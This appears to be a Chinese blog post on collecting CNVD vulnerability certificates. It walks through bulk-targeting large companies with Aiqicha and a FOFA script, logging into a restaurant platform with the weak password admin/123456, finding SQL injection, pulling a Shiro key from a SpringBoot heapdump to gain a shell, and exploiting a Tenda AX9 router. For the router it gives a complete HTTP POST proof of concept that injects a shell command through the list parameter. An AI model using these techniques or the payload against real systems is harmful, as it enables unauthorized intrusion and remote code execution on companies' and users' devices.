对于想要挖cnvd证书的师傅,我们可以通过爱企查的高级查询,导出5000万以上的企业

如果是挖APP的证书的话,勾上APP应用

后面在爱企查导出5000万以上的企业后我们配合脚本

https://github.com/colind0pe/new_cnvd_fofa_gather

通过公司名称，在fofa上搜索可能存在通用产品的公司，原理是判断网站标题数目以及独立IP数达到一定条件时将该标题以及公司名称导出；如果想挖掘cnvd证书，可导出注册资金大于5000w的公司到这个脚本中进行通用系统收集。

修改脚本第10、11行为你的FOFA账号的邮箱和API KEY

# 填入fofa账号的email和API_KEY
email = 'YOUR_EMAIL'
api_key = 'API_KEY'

将公司名称放入gs.txt文件中，执行该脚本即可

python3 new_cnvd_fofa_gather.py

比如我们通过FOFA

可以看到有相关搜索,这里全是可以测试的,也是最为费劲的方式

笔者在这里就找到了个餐厅管理平台,然后拿到了证书

通过admin 123456弱口令进入

在该处发现了SQL注入漏洞

也满足了证书派发条件

在后面又找到了SpringBoot泄露shiro的key然后shiro反序列化getshell的10.0评分漏洞

很可惜资本不够(无证书)

这里是通过Burp的SpringScan插件扫描到SpringBoot泄露

通过下载heapdump文件获得shiro密钥

获取其中的shiro key
JDumpSpider：https://github.com/whwlsfb/JDumpSpider
这个小工具可以自动爬取heapdump中的信息
直接运行:java -jar JDumpSpider.jar 放入你的heapdump文件 即可自动获取变量信息，这里获取到ShiroKey

两个密钥都可以尝试
然后利用Shiro反序列化工具gets

挖掘路由器漏洞(对于学二进制方向的师傅)

这里的案例是Tenda AX9命令注入RCE

此漏洞位于/goform/SetNetControlList接口

固件下载网址在这里

https://www.tenda.com.cn/download/detail-3734.html

下载好之后通过binwalk -t -e .bin文件提取固件系统

这里主要分析httpd文件和libtd_server.so文件

在sub_43FDCC中，list参数在未经验证的情况下被传递给sscanf，然后进一步传递给add_tc_traffic_control，这个是在libtd_server.so文件中定义的函数。在该函数中，通过v16进入到

doSystemCmd再发生在snprintf函数中造成命令注入
POC:

POST /goform/SetNetControlList HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Connection: close

list=233%0d;111;whoami;%0d233333%0d233333%0d